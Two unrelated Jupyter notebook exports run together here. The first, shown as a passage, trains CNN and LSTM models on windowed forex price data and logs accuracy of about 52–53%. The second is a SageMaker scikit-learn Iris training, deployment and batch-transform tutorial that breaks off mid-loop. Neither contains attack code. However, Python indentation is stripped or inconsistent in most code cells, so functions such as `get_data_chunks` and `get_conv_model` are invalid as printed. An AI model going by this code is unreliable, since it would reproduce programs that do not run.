concatenate_length_check(low_test_data_list, test_low_data)
concatenate_length_check(close_test_data_list, test_close_data)
###Output
_____no_output_____
###Markdown
General Variables For Prediction.
###Code
# How many of the past points were involved.
WINDOW = 30
# How many of data type is used as multivariate(open,high,low,close = 4)
EMB_SIZE = 4
# Stride: how many points to move between consecutive training windows
STEP = 1
# Determines which time should be predictied
#(1 = 1 min further is predicted)
#(60 = 1 hour further is predicted)
FORECAST = 1
# Determines whether the data is to be loaded.
LOAD = True
###Output
_____no_output_____
###Markdown
Separate Train, Valid, Test
Construct The Desired Data
Get the data as chunks with respect to window_size and the other variables.
###Code
def get_data_chunks(d_list, length, window=30, forecast=1, step=1):
X = []
Y = []
    for i in range(0, length, step):
        try:
            # Get windowed data
            o = d_list[0][i:i+window] # open
            h = d_list[1][i:i+window] # high
            l = d_list[2][i:i+window] # low
            c = d_list[3][i:i+window] # close
            # Normalize data
            o = (np.array(o) - np.mean(o)) / np.std(o)
            h = (np.array(h) - np.mean(h)) / np.std(h)
            l = (np.array(l) - np.mean(l)) / np.std(l)
            c = (np.array(c) - np.mean(c)) / np.std(c)
            # window of closes and the target close `forecast` steps ahead
            x_i = d_list[3][i:i+window]
            y_i = d_list[3][i+window+forecast]
last_close = x_i[-1]
next_close = y_i
if last_close < next_close:
y_i = [1, 0]
else:
y_i = [0, 1]
x_i = np.column_stack((o,h,l,c))
except Exception as e:
print(e)
# break when the limit is not enough
break
X.append(x_i)
Y.append(y_i)
print("data chunks are ready...")
return [X, Y]
def get_train_validation(X, y, percentage=0.8):
iXPercentage = int(len(X) * percentage)
iYPercentage = int(len(y) * percentage)
X_train = X[0:iXPercentage]
Y_train = y[0:iYPercentage]
#X_train, Y_train = shuffle_in_unison(X_train, Y_train)
X_test = X[iXPercentage:]
Y_test = y[iYPercentage:]
return X_train, X_test, Y_train, Y_test
###Output
_____no_output_____
###Markdown
Construct Data By Hand
If there isn't any previously saved data, construct it here; otherwise, load the data from your files.
###Code
# PROCESSES WHOLE TRAIN SET
TRAIN_LENGTH = len(all_close_data)
TEST_LENGTH = len(test_close_data)
d_list = [all_open_data, all_high_data, all_low_data, all_close_data]
d_list_test = [test_open_data, test_high_data, test_low_data, test_close_data]
X, Y = get_data_chunks(d_list, TRAIN_LENGTH, window=WINDOW, forecast=FORECAST, step=STEP)
X_test, Y_test = get_data_chunks(d_list_test, TEST_LENGTH, window=WINDOW, forecast=FORECAST, step=STEP)
X = np.array(X)
Y = np.array(Y)
X_test = np.array(X_test)
Y_test = np.array(Y_test)
# Save X, Y and X_test, Y_test
save_folder = "/content/gdrive/My Drive/deep_learning/_data/numpy_arrays/"
filename="forex_multivariate_forecasting"
# Save Y
y_h5 = h5py.File(save_folder+filename+"_y.h5", 'w')
y_h5.create_dataset('dataset_Y', data=Y)
y_h5.close()
print("Saving Y Completed")
# Save X
x_h5 = h5py.File(save_folder+filename+"_x.h5", 'w')
x_h5.create_dataset('dataset_X', data=X)
x_h5.close()
print("Saving X Completed")
# Save X_test
x_test_h5 = h5py.File(save_folder+filename+"_x_test.h5", 'w')
x_test_h5.create_dataset('dataset_X_test', data=X_test)
x_test_h5.close()
print("Saving X_test Completed")
# Save Y_test
y_test_h5 = h5py.File(save_folder+filename+"_y_test.h5", 'w')
y_test_h5.create_dataset('dataset_Y_test', data=Y_test)
y_test_h5.close()
print("Saving Y_test Completed")
save_folder = "/content/gdrive/My Drive/deep_learning/_data/numpy_arrays/"
filename="forex_multivariate_forecasting"
# data can be loaded by this.
if(LOAD):
h5f = h5py.File(save_folder+filename+"_x.h5",'r')
X = h5f['dataset_X'][:]
h5f.close()
h5f = h5py.File(save_folder+filename+"_y.h5",'r')
Y = h5f['dataset_Y'][:]
h5f.close()
h5f = h5py.File(save_folder+filename+"_x_test.h5",'r')
X_test = h5f['dataset_X_test'][:]
h5f.close()
h5f = h5py.File(save_folder+filename+"_y_test.h5",'r')
Y_test = h5f['dataset_Y_test'][:]
h5f.close()
X_train, X_val, Y_train, Y_val = get_train_validation(X, Y)
print("OLD_shapes")
print(X.shape)
print(Y.shape)
print("*"*40)
print("New Shapes")
print(X_train.shape)
print(Y_train.shape)
print(X_val.shape)
print(Y_val.shape)
# reshape data
X_train = np.reshape(X_train, (X_train.shape[0], X_train.shape[1], EMB_SIZE))
X_test = np.reshape(X_test, (X_test.shape[0], X_test.shape[1], EMB_SIZE))
X_val = np.reshape(X_val, (X_val.shape[0], X_val.shape[1], EMB_SIZE))
print(X_train.shape)
print(X_val.shape)
print(X_test.shape)
###Output
(1780950, 30, 4)
(445238, 30, 4)
(54667, 30, 4)
###Markdown
Reduce the size of train data
The train data has 1,780,950 points, which leads to an enormous increase in training time, so reduce it if your setup cannot handle this much data. Reducing the number of data points may also help in terms of reducing overfitting.
###Code
#Reduce data points
exercise_use_percentage = 0.5
full_data_points = len(X)
desired_data_points = int(exercise_use_percentage * full_data_points)
X = X[desired_data_points:]
Y = Y[desired_data_points:]
# Get train and validation
X_train, X_val, Y_train, Y_val = get_train_validation(X, Y)
print("OLD_shapes")
print(X.shape)
print(Y.shape)
print("*"*40)
print("New Shapes")
print(X_train.shape)
print(Y_train.shape)
print(X_val.shape)
print(Y_val.shape)
# reshape data
X_train = np.reshape(X_train, (X_train.shape[0], X_train.shape[1], EMB_SIZE))
X_test = np.reshape(X_test, (X_test.shape[0], X_test.shape[1], EMB_SIZE))
X_val = np.reshape(X_val, (X_val.shape[0], X_val.shape[1], EMB_SIZE))
print(X_train.shape)
print(X_val.shape)
print(X_test.shape)
###Output
OLD_shapes
(556547, 30, 4)
(556547, 2)
****************************************
New Shapes
(445237, 30, 4)
(445237, 2)
(111310, 30, 4)
(111310, 2)
(445237, 30, 4)
(111310, 30, 4)
(54667, 30, 4)
###Markdown
Construct Model
###Code
def get_conv_model(tensor_shape, filter_size=64, kernel_size=4,dropout=0.5):
model = tf.keras.Sequential()
model.add(layers.Conv1D(input_shape=tensor_shape,
filters=filter_size,
kernel_size=kernel_size,
padding='same'))
model.add(layers.BatchNormalization())
model.add(layers.LeakyReLU())
model.add(layers.Dropout(dropout))
model.add(layers.Conv1D(filters=filter_size,
kernel_size=kernel_size,
padding='same'))
model.add(layers.MaxPool1D(pool_size=2,
padding='same'))
model.add(layers.Dropout(dropout))
model.add(layers.Flatten())
model.add(layers.Dense(64))
model.add(layers.BatchNormalization())
model.add(layers.LeakyReLU())
model.add(layers.Dense(2))
model.add(layers.Activation('softmax'))
return model
model = get_conv_model(tensor_shape=(WINDOW, EMB_SIZE))
model.summary()
###Output
_________________________________________________________________
Layer (type) Output Shape Param #
=================================================================
conv1d_2 (Conv1D) (None, 30, 64) 1088
_________________________________________________________________
batch_normalization_v1_3 (Ba (None, 30, 64) 256
_________________________________________________________________
leaky_re_lu_3 (LeakyReLU) (None, 30, 64) 0
_________________________________________________________________
dropout_2 (Dropout) (None, 30, 64) 0
_________________________________________________________________
conv1d_3 (Conv1D) (None, 30, 64) 16448
_________________________________________________________________
max_pooling1d (MaxPooling1D) (None, 15, 64) 0
_________________________________________________________________
dropout_3 (Dropout) (None, 15, 64) 0
_________________________________________________________________
flatten_1 (Flatten) (None, 960) 0
_________________________________________________________________
dense_2 (Dense) (None, 64) 61504
_________________________________________________________________
batch_normalization_v1_4 (Ba (None, 64) 256
_________________________________________________________________
leaky_re_lu_4 (LeakyReLU) (None, 64) 0
_________________________________________________________________
dense_3 (Dense) (None, 2) 130
_________________________________________________________________
activation_1 (Activation) (None, 2) 0
=================================================================
Total params: 79,682
Trainable params: 79,426
Non-trainable params: 256
_________________________________________________________________
###Markdown
TRAIN
###Code
#OPTIMIZER
opt = tf.keras.optimizers.Adam(lr=0.002)
#tf.train.AdamOptimizer(learning_rate=0.002)
# CALLBACKS
fp = save_folder+"fx_multivariate_model.hdf5"
reduce_lr = tf.keras.callbacks.ReduceLROnPlateau(monitor='val_loss', factor=0.9, patience=30, min_lr=0.000001, verbose=1)
checkpointer = tf.keras.callbacks.ModelCheckpoint(filepath=fp, verbose=1, save_best_only=True)
#COMPILE
model.compile(optimizer=opt,
loss='categorical_crossentropy',
metrics=['accuracy'])
# TRAIN
# epochs= 100 normally
# batch_size = 128
history = model.fit(
X_train,
Y_train,
epochs = 30,
batch_size = 128,
verbose=1,
validation_data=(X_val, Y_val),
callbacks=[reduce_lr, checkpointer],
shuffle=True)
###Output
Train on 445237 samples, validate on 111310 samples
WARNING:tensorflow:From /usr/local/lib/python3.6/dist-packages/tensorflow/python/ops/math_ops.py:3066: to_int32 (from tensorflow.python.ops.math_ops) is deprecated and will be removed in a future version.
Instructions for updating:
Use tf.cast instead.
Epoch 1/30
445184/445237 [============================>.] - ETA: 0s - loss: 0.6955 - acc: 0.5147
Epoch 00001: val_loss improved from inf to 0.69360, saving model to /content/gdrive/My Drive/deep_learning/_data/numpy_arrays/fx_multivariate_model.hdf5
445237/445237 [==============================] - 121s 271us/sample - loss: 0.6955 - acc: 0.5146 - val_loss: 0.6936 - val_acc: 0.5037
Epoch 2/30
445056/445237 [============================>.] - ETA: 0s - loss: 0.6920 - acc: 0.5219
Epoch 00002: val_loss improved from 0.69360 to 0.69149, saving model to /content/gdrive/My Drive/deep_learning/_data/numpy_arrays/fx_multivariate_model.hdf5
445237/445237 [==============================] - 118s 266us/sample - loss: 0.6920 - acc: 0.5219 - val_loss: 0.6915 - val_acc: 0.5257
Epoch 3/30
445056/445237 [============================>.] - ETA: 0s - loss: 0.6916 - acc: 0.5237
Epoch 00003: val_loss improved from 0.69149 to 0.69141, saving model to /content/gdrive/My Drive/deep_learning/_data/numpy_arrays/fx_multivariate_model.hdf5
445237/445237 [==============================] - 120s 270us/sample - loss: 0.6916 - acc: 0.5237 - val_loss: 0.6914 - val_acc: 0.5253
Epoch 4/30
445184/445237 [============================>.] - ETA: 0s - loss: 0.6915 - acc: 0.5248
Epoch 00004: val_loss improved from 0.69141 to 0.69121, saving model to /content/gdrive/My Drive/deep_learning/_data/numpy_arrays/fx_multivariate_model.hdf5
445237/445237 [==============================] - 119s 268us/sample - loss: 0.6915 - acc: 0.5248 - val_loss: 0.6912 - val_acc: 0.5271
Epoch 5/30
445056/445237 [============================>.] - ETA: 0s - loss: 0.6914 - acc: 0.5251
Epoch 00005: val_loss improved from 0.69121 to 0.69111, saving model to /content/gdrive/My Drive/deep_learning/_data/numpy_arrays/fx_multivariate_model.hdf5
445237/445237 [==============================] - 118s 264us/sample - loss: 0.6914 - acc: 0.5251 - val_loss: 0.6911 - val_acc: 0.5276
Epoch 6/30
445184/445237 [============================>.] - ETA: 0s - loss: 0.6913 - acc: 0.5256
Epoch 00006: val_loss improved from 0.69111 to 0.69095, saving model to /content/gdrive/My Drive/deep_learning/_data/numpy_arrays/fx_multivariate_model.hdf5
445237/445237 [==============================] - 118s 264us/sample - loss: 0.6913 - acc: 0.5255 - val_loss: 0.6909 - val_acc: 0.5278
Epoch 7/30
445056/445237 [============================>.] - ETA: 0s - loss: 0.6913 - acc: 0.5263
Epoch 00007: val_loss improved from 0.69095 to 0.69075, saving model to /content/gdrive/My Drive/deep_learning/_data/numpy_arrays/fx_multivariate_model.hdf5
445237/445237 [==============================] - 117s 263us/sample - loss: 0.6913 - acc: 0.5263 - val_loss: 0.6908 - val_acc: 0.5277
Epoch 8/30
445184/445237 [============================>.] - ETA: 0s - loss: 0.6913 - acc: 0.5265
Epoch 00008: val_loss did not improve from 0.69075
445237/445237 [==============================] - 119s 267us/sample - loss: 0.6913 - acc: 0.5265 - val_loss: 0.6909 - val_acc: 0.5278
Epoch 9/30
445184/445237 [============================>.] - ETA: 0s - loss: 0.6912 - acc: 0.5267
Epoch 00009: val_loss did not improve from 0.69075
445237/445237 [==============================] - 118s 264us/sample - loss: 0.6912 - acc: 0.5267 - val_loss: 0.6910 - val_acc: 0.5277
Epoch 10/30
445184/445237 [============================>.] - ETA: 0s - loss: 0.6912 - acc: 0.5260
Epoch 00010: val_loss did not improve from 0.69075
445237/445237 [==============================] - 118s 266us/sample - loss: 0.6912 - acc: 0.5260 - val_loss: 0.6912 - val_acc: 0.5255
Epoch 11/30
445184/445237 [============================>.] - ETA: 0s - loss: 0.6912 - acc: 0.5261
Epoch 00011: val_loss did not improve from 0.69075
445237/445237 [==============================] - 117s 263us/sample - loss: 0.6912 - acc: 0.5261 - val_loss: 0.6909 - val_acc: 0.5271
Epoch 12/30
445184/445237 [============================>.] - ETA: 0s - loss: 0.6912 - acc: 0.5265
Epoch 00012: val_loss did not improve from 0.69075
445237/445237 [==============================] - 118s 265us/sample - loss: 0.6912 - acc: 0.5265 - val_loss: 0.6909 - val_acc: 0.5273
Epoch 13/30
445184/445237 [============================>.] - ETA: 0s - loss: 0.6911 - acc: 0.5271
Epoch 00013: val_loss did not improve from 0.69075
445237/445237 [==============================] - 118s 264us/sample - loss: 0.6911 - acc: 0.5271 - val_loss: 0.6908 - val_acc: 0.5285
Epoch 14/30
445184/445237 [============================>.] - ETA: 0s - loss: 0.6911 - acc: 0.5269
Epoch 00014: val_loss did not improve from 0.69075
445237/445237 [==============================] - 117s 262us/sample - loss: 0.6911 - acc: 0.5269 - val_loss: 0.6910 - val_acc: 0.5274
Epoch 15/30
445184/445237 [============================>.] - ETA: 0s - loss: 0.6911 - acc: 0.5273
Epoch 00015: val_loss did not improve from 0.69075
445237/445237 [==============================] - 118s 265us/sample - loss: 0.6911 - acc: 0.5273 - val_loss: 0.6909 - val_acc: 0.5281
Epoch 16/30
445184/445237 [============================>.] - ETA: 0s - loss: 0.6911 - acc: 0.5275
Epoch 00016: val_loss did not improve from 0.69075
445237/445237 [==============================] - 117s 264us/sample - loss: 0.6911 - acc: 0.5275 - val_loss: 0.6909 - val_acc: 0.5266
Epoch 17/30
445184/445237 [============================>.] - ETA: 0s - loss: 0.6911 - acc: 0.5266
Epoch 00017: val_loss did not improve from 0.69075
445237/445237 [==============================] - 118s 266us/sample - loss: 0.6911 - acc: 0.5266 - val_loss: 0.6909 - val_acc: 0.5274
Epoch 18/30
445184/445237 [============================>.] - ETA: 0s - loss: 0.6911 - acc: 0.5267
Epoch 00018: val_loss did not improve from 0.69075
445237/445237 [==============================] - 117s 264us/sample - loss: 0.6911 - acc: 0.5267 - val_loss: 0.6930 - val_acc: 0.5210
Epoch 19/30
445184/445237 [============================>.] - ETA: 0s - loss: 0.6911 - acc: 0.5269
Epoch 00019: val_loss did not improve from 0.69075
445237/445237 [==============================] - 118s 265us/sample - loss: 0.6911 - acc: 0.5269 - val_loss: 0.6909 - val_acc: 0.5279
Epoch 20/30
445184/445237 [============================>.] - ETA: 0s - loss: 0.6911 - acc: 0.5270
Epoch 00020: val_loss did not improve from 0.69075
445237/445237 [==============================] - 118s 264us/sample - loss: 0.6911 - acc: 0.5270 - val_loss: 0.6910 - val_acc: 0.5273
Epoch 21/30
445056/445237 [============================>.] - ETA: 0s - loss: 0.6911 - acc: 0.5275
Epoch 00021: val_loss did not improve from 0.69075
445237/445237 [==============================] - 117s 262us/sample - loss: 0.6911 - acc: 0.5275 - val_loss: 0.6914 - val_acc: 0.5243
Epoch 22/30
445056/445237 [============================>.] - ETA: 0s - loss: 0.6910 - acc: 0.5268
Epoch 00022: val_loss did not improve from 0.69075
445237/445237 [==============================] - 116s 261us/sample - loss: 0.6910 - acc: 0.5268 - val_loss: 0.6908 - val_acc: 0.5287
Epoch 23/30
445184/445237 [============================>.] - ETA: 0s - loss: 0.6910 - acc: 0.5272
Epoch 00023: val_loss did not improve from 0.69075
445237/445237 [==============================] - 116s 260us/sample - loss: 0.6910 - acc: 0.5272 - val_loss: 0.6908 - val_acc: 0.5284
Epoch 24/30
445056/445237 [============================>.] - ETA: 0s - loss: 0.6910 - acc: 0.5273
Epoch 00024: val_loss did not improve from 0.69075
445237/445237 [==============================] - 118s 264us/sample - loss: 0.6910 - acc: 0.5273 - val_loss: 0.6909 - val_acc: 0.5293
Epoch 25/30
445184/445237 [============================>.] - ETA: 0s - loss: 0.6910 - acc: 0.5274
Epoch 00025: val_loss did not improve from 0.69075
445237/445237 [==============================] - 117s 263us/sample - loss: 0.6910 - acc: 0.5274 - val_loss: 0.6910 - val_acc: 0.5272
Epoch 26/30
445184/445237 [============================>.] - ETA: 0s - loss: 0.6910 - acc: 0.5274
Epoch 00026: val_loss did not improve from 0.69075
445237/445237 [==============================] - 115s 259us/sample - loss: 0.6910 - acc: 0.5274 - val_loss: 0.6908 - val_acc: 0.5285
Epoch 27/30
445184/445237 [============================>.] - ETA: 0s - loss: 0.6910 - acc: 0.5277
Epoch 00027: val_loss did not improve from 0.69075
445237/445237 [==============================] - 117s 262us/sample - loss: 0.6910 - acc: 0.5277 - val_loss: 0.6910 - val_acc: 0.5281
Epoch 28/30
445184/445237 [============================>.] - ETA: 0s - loss: 0.6911 - acc: 0.5271
Epoch 00028: val_loss did not improve from 0.69075
445237/445237 [==============================] - 119s 267us/sample - loss: 0.6911 - acc: 0.5271 - val_loss: 0.6909 - val_acc: 0.5289
Epoch 29/30
445184/445237 [============================>.] - ETA: 0s - loss: 0.6910 - acc: 0.5272
Epoch 00029: val_loss did not improve from 0.69075
445237/445237 [==============================] - 118s 265us/sample - loss: 0.6910 - acc: 0.5272 - val_loss: 0.6909 - val_acc: 0.5282
Epoch 30/30
445184/445237 [============================>.] - ETA: 0s - loss: 0.6910 - acc: 0.5282
Epoch 00030: val_loss did not improve from 0.69075
445237/445237 [==============================] - 118s 265us/sample - loss: 0.6910 - acc: 0.5282 - val_loss: 0.6909 - val_acc: 0.5289
###Markdown
TEST
###Code
# TEST
# LOAD weights
model.load_weights(fp)
pred = model.predict(np.array(X_test))
pred
#from sklearn.metrics import classification_report
#from sklearn.metrics import confusion_matrix
#C = confusion_matrix([np.argmax(y) for y in Y_test], [np.argmax(y) for y in pred])
#print(C)
#print("*"*20)
#print(C / C.astype(np.float).sum(axis=1))
model.evaluate(X_test,Y_test,batch_size=128)
###Output
0.5340150364936799
###Markdown
PLOT Trained Model
###Code
# PLOT
plt.figure()
plt.plot(history.history['loss'])
plt.plot(history.history['val_loss'])
plt.title('model loss')
plt.ylabel('loss')
plt.xlabel('epoch')
plt.legend(['train', 'test'], loc='best')
plt.show()
plt.figure()
plt.plot(history.history['acc'])
plt.plot(history.history['val_acc'])
plt.title('model accuracy')
plt.ylabel('accuracy')
plt.xlabel('epoch')
plt.legend(['train', 'test'], loc='best')
plt.show()
###Output
_____no_output_____
###Markdown
LSTM approach
###Code
def build_lstm_model(tensor_shape, batch_size=128, hidden_neurons=100):
model = tf.keras.Sequential()
model.add(layers.LSTM(hidden_neurons,
batch_input_shape=(batch_size, tensor_shape[0], tensor_shape[1]),
return_sequences=True))
model.add(layers.LSTM(hidden_neurons, return_sequences=True))
model.add(layers.LSTM(hidden_neurons))
model.add(layers.Flatten())
model.add(layers.Dense(64,activation='relu'))
model.add(layers.BatchNormalization())
model.add(layers.Dense(32,activation='relu'))
model.add(layers.Dense(2, activation='softmax'))
return model
BATCH_SIZE=512
print(X_train.shape)
model_2 = build_lstm_model(tensor_shape=(X_train.shape[1], X_train.shape[2]), batch_size=BATCH_SIZE)
model_2.summary()
#OPTIMIZER
opt = tf.keras.optimizers.Adam(lr=0.002)
#tf.train.AdamOptimizer(learning_rate=0.002)
# CALLBACKS
fp = save_folder+"fx_multivariate_model_lstm.hdf5"
reduce_lr = tf.keras.callbacks.ReduceLROnPlateau(monitor='val_loss', factor=0.9, patience=30, min_lr=0.000001, verbose=1)
checkpointer = tf.keras.callbacks.ModelCheckpoint(filepath=fp, verbose=1, save_best_only=True)
#COMPILE
model_2.compile(optimizer=opt,
loss='categorical_crossentropy',
metrics=['accuracy'])
# TRAIN
# epochs= 100 normally
# batch_size = 128
history = model_2.fit(
X_train,
Y_train,
epochs = 1,
batch_size = 512,
verbose=1,
validation_data=(X_val, Y_val),
callbacks=[reduce_lr, checkpointer],
shuffle=True)
###Output
_____no_output_____ |
sklearn_batch_transform_iris/scikit_learn_estimator_example_with_batch_transform.ipynb | ###Markdown
Iris Training and Prediction with Sagemaker Scikit-learnThis tutorial shows you how to use [Scikit-learn](https://scikit-learn.org/stable/) with Sagemaker by utilizing the pre-built container. Scikit-learn is a popular Python machine learning framework. It includes a number of different algorithms for classification, regression, clustering, dimensionality reduction, and data/feature pre-processing. The [sagemaker-python-sdk](https://github.com/aws/sagemaker-python-sdk) module makes it easy to take existing scikit-learn code, which we will show by training a model on the IRIS dataset and generating a set of predictions. For more information about the Scikit-learn container, see the [sagemaker-scikit-learn-containers](https://github.com/aws/sagemaker-scikit-learn-container) repository and the [sagemaker-python-sdk](https://github.com/aws/sagemaker-python-sdk) repository.For more on Scikit-learn, please visit the Scikit-learn website: https://scikit-learn.org. Table of contents* [Upload the data for training](#upload_data)* [Create a Scikit-learn script to train with](#create_sklearn_script)* [Create the SageMaker Scikit Estimator](#create_sklearn_estimator)* [Train the SKLearn Estimator on the Iris data](#train_sklearn)* [Using the trained model to make inference requests](#inferece) * [Deploy the model](#deploy) * [Choose some data and use it for a prediction](#prediction_request) * [Endpoint cleanup](#endpoint_cleanup)* [Batch Transform](#batch_transform) * [Prepare Input Data](#prepare_input_data) * [Run Transform Job](#run_transform_job) * [Check Output Data](#check_output_data) **Note: this example requires SageMaker Python SDK v2.**
###Code
%pip install -U "sagemaker>=2.15"
###Output
_____no_output_____
###Markdown
First, lets create our Sagemaker session and role, and create a S3 prefix to use for the notebook example.
###Code
# S3 prefix
prefix = 'Scikit-iris'
import sagemaker
from sagemaker import get_execution_role
sagemaker_session = sagemaker.Session()
# Get a SageMaker-compatible role used by this Notebook Instance.
role = get_execution_role()
###Output
_____no_output_____
###Markdown
Upload the data for training When training large models with huge amounts of data, you'll typically use big data tools, like Amazon Athena, AWS Glue, or Amazon EMR, to create your data in S3. For the purposes of this example, we're using a sample of the classic [Iris dataset](https://en.wikipedia.org/wiki/Iris_flower_data_set), which is included with Scikit-learn. We will load the dataset, write it locally, then upload it to S3.
###Code
import numpy as np
import os
from sklearn import datasets
# Load Iris dataset, then join labels and features
iris = datasets.load_iris()
joined_iris = np.insert(iris.data, 0, iris.target, axis=1)
# Create directory and write csv
os.makedirs('./data', exist_ok=True)
np.savetxt('./data/iris.csv', joined_iris, delimiter=',', fmt='%1.1f, %1.3f, %1.3f, %1.3f, %1.3f')
###Output
_____no_output_____
###Markdown
Once we have the data locally, we can use the tools provided by the SageMaker Python SDK to upload the data to a default bucket.
###Code
WORK_DIRECTORY = 'data'
train_input = sagemaker_session.upload_data(WORK_DIRECTORY, key_prefix="{}/{}".format(prefix, WORK_DIRECTORY) )
###Output
_____no_output_____
###Markdown
Create a Scikit-learn script to train with SageMaker can now run a scikit-learn script using the `SKLearn` estimator. When executed on SageMaker a number of helpful environment variables are available to access properties of the training environment, such as:* `SM_MODEL_DIR`: A string representing the path to the directory to write model artifacts to. Any artifacts saved in this folder are uploaded to S3 for model hosting after the training job completes.* `SM_OUTPUT_DIR`: A string representing the filesystem path to write output artifacts to. Output artifacts may include checkpoints, graphs, and other files to save, not including model artifacts. These artifacts are compressed and uploaded to S3 to the same S3 prefix as the model artifacts.Supposing two input channels, 'train' and 'test', were used in the call to the `SKLearn` estimator's `fit()` method, the following environment variables will be set, following the format `SM_CHANNEL_[channel_name]`:* `SM_CHANNEL_TRAIN`: A string representing the path to the directory containing data in the 'train' channel* `SM_CHANNEL_TEST`: Same as above, but for the 'test' channel.A typical training script loads data from the input channels, configures training with hyperparameters, trains a model, and saves a model to model_dir so that it can be hosted later. Hyperparameters are passed to your script as arguments and can be retrieved with an `argparse.ArgumentParser` instance. For example, the script that we will run in this notebook is the below:```pythonfrom __future__ import print_functionimport argparseimport joblibimport osimport pandas as pdfrom sklearn import treeif __name__ == '__main__': parser = argparse.ArgumentParser() Hyperparameters are described here. In this simple example we are just including one hyperparameter. parser.add_argument('--max_leaf_nodes', type=int, default=-1) Sagemaker specific arguments. Defaults are set in the environment variables. parser.add_argument('--output-data-dir', type=str, default=os.environ['SM_OUTPUT_DATA_DIR']) parser.add_argument('--model-dir', type=str, default=os.environ['SM_MODEL_DIR']) parser.add_argument('--train', type=str, default=os.environ['SM_CHANNEL_TRAIN']) args = parser.parse_args() Take the set of files and read them all into a single pandas dataframe input_files = [ os.path.join(args.train, file) for file in os.listdir(args.train) ] if len(input_files) == 0: raise ValueError(('There are no files in {}.\n' + 'This usually indicates that the channel ({}) was incorrectly specified,\n' + 'the data specification in S3 was incorrectly specified or the role specified\n' + 'does not have permission to access the data.').format(args.train, "train")) raw_data = [ pd.read_csv(file, header=None, engine="python") for file in input_files ] train_data = pd.concat(raw_data) labels are in the first column train_y = train_data.iloc[:, 0] train_X = train_data.iloc[:, 1:] Here we support a single hyperparameter, 'max_leaf_nodes'. Note that you can add as many as your training may require in the ArgumentParser above. max_leaf_nodes = args.max_leaf_nodes Now use scikit-learn's decision tree classifier to train the model. 
clf = tree.DecisionTreeClassifier(max_leaf_nodes=max_leaf_nodes) clf = clf.fit(train_X, train_y) Print the coefficients of the trained classifier, and save the coefficients joblib.dump(clf, os.path.join(args.model_dir, "model.joblib"))def model_fn(model_dir): """Deserialize and return a fitted model Note that this should have the same name as the serialized model in the main method """ clf = joblib.load(os.path.join(model_dir, "model.joblib")) return clf``` Because the Scikit-learn container imports your training script, you should always put your training code in a main guard `(if __name__=='__main__':)` so that the container does not inadvertently run your training code at the wrong point in execution.For more information about training environment variables, please visit https://github.com/aws/sagemaker-containers. Create SageMaker Scikit Estimator To run our Scikit-learn training script on SageMaker, we construct a `sagemaker.sklearn.estimator.SKLearn` estimator, which accepts several constructor arguments:* __entry_point__: The path to the Python script SageMaker runs for training and prediction.* __role__: Role ARN* __instance_type__ *(optional)*: The type of SageMaker instances for training. __Note__: Because Scikit-learn does not natively support GPU training, Sagemaker Scikit-learn does not currently support training on GPU instance types.* __sagemaker_session__ *(optional)*: The session used to train on Sagemaker.* __hyperparameters__ *(optional)*: A dictionary passed to the train function as hyperparameters.To see the code for the SKLearn Estimator, see here: https://github.com/aws/sagemaker-python-sdk/tree/master/src/sagemaker/sklearn
###Code
from sagemaker.sklearn.estimator import SKLearn
FRAMEWORK_VERSION = "0.23-1"
script_path = 'scikit_learn_iris.py'
sklearn = SKLearn(
entry_point=script_path,
framework_version=FRAMEWORK_VERSION,
instance_type="ml.c4.xlarge",
role=role,
sagemaker_session=sagemaker_session,
hyperparameters={'max_leaf_nodes': 30})
###Output
_____no_output_____
###Markdown
Train SKLearn Estimator on Iris data Training is very simple, just call `fit` on the Estimator! This will start a SageMaker Training job that will download the data for us, invoke our scikit-learn code (in the provided script file), and save any model artifacts that the script creates.
###Code
sklearn.fit({'train': train_input})
###Output
_____no_output_____
###Markdown
Using the trained model to make inference requests Deploy the model Deploying the model to SageMaker hosting just requires a `deploy` call on the fitted model. This call takes an instance count and instance type.
###Code
predictor = sklearn.deploy(initial_instance_count=1, instance_type="ml.m5.xlarge")
###Output
_____no_output_____
###Markdown
Choose some data and use it for a prediction In order to do some predictions, we'll extract some of the data we used for training and do predictions against it. This is, of course, bad statistical practice, but a good way to see how the mechanism works.
###Code
import itertools
import pandas as pd
shape = pd.read_csv("data/iris.csv", header=None)
a = [50*i for i in range(3)]
b = [40+i for i in range(10)]
indices = [i+j for i,j in itertools.product(a,b)]
test_data = shape.iloc[indices[:-1]]
test_X = test_data.iloc[:,1:]
test_y = test_data.iloc[:,0]
###Output
_____no_output_____
###Markdown
Prediction is as easy as calling predict with the predictor we got back from deploy and the data we want to do predictions with. The output from the endpoint returns a numerical representation of the classification prediction; in the original dataset, these are flower names, but in this example the labels are numerical. We can compare against the original label that we parsed.
###Code
print(predictor.predict(test_X.values))
print(test_y.values)
###Output
_____no_output_____
###Markdown
Endpoint cleanup When you're done with the endpoint, you'll want to clean it up.
###Code
predictor.delete_endpoint()
###Output
_____no_output_____
###Markdown
Batch Transform We can also use the trained model for asynchronous batch inference on S3 data using SageMaker Batch Transform.
###Code
# Define a SKLearn Transformer from the trained SKLearn Estimator
transformer = sklearn.transformer(instance_count=1, instance_type='ml.m5.xlarge')
###Output
_____no_output_____
###Markdown
Prepare Input Data We will extract 10 random samples of 100 rows from the training data, then split the features (X) from the labels (Y). Then upload the input data to a given location in S3.
###Code
%%bash
# Randomly sample the iris dataset 10 times, then split X and Y
mkdir -p batch_data/XY batch_data/X batch_data/Y
for i in {0..9}; do
cat data/iris.csv | shuf -n 100 > batch_data/XY/iris_sample_${i}.csv
cat batch_data/XY/iris_sample_${i}.csv | cut -d',' -f2- > batch_data/X/iris_sample_X_${i}.csv
cat batch_data/XY/iris_sample_${i}.csv | cut -d',' -f1 > batch_data/Y/iris_sample_Y_${i}.csv
done
# Upload input data from local filesystem to S3
batch_input_s3 = sagemaker_session.upload_data('batch_data/X', key_prefix=prefix + '/batch_input')
###Output
_____no_output_____
###Markdown
Run Transform Job Using the Transformer, run a transform job on the S3 input data.
###Code
# Start a transform job and wait for it to finish
transformer.transform(batch_input_s3, content_type='text/csv')
print('Waiting for transform job: ' + transformer.latest_transform_job.job_name)
transformer.wait()
###Output
_____no_output_____
###Markdown
Check Output Data After the transform job has completed, download the output data from S3. For each file "f" in the input data, we have a corresponding file "f.out" containing the predicted labels from each input row. We can compare the predicted labels to the true labels saved earlier.
###Code
# Download the output data from S3 to local filesystem
batch_output = transformer.output_path
!mkdir -p batch_data/output
!aws s3 cp --recursive $batch_output/ batch_data/output/
# Head to see what the batch output looks like
!head batch_data/output/*
%%bash
# For each sample file, compare the predicted labels from batch output to the true labels
for i in {0..9}; do
diff -s batch_data/Y/iris_sample_Y_${i}.csv \
<(cat batch_data/output/iris_sample_X_${i}.csv.out | sed 's/[["]//g' | sed 's/, \|]/\n/g') \
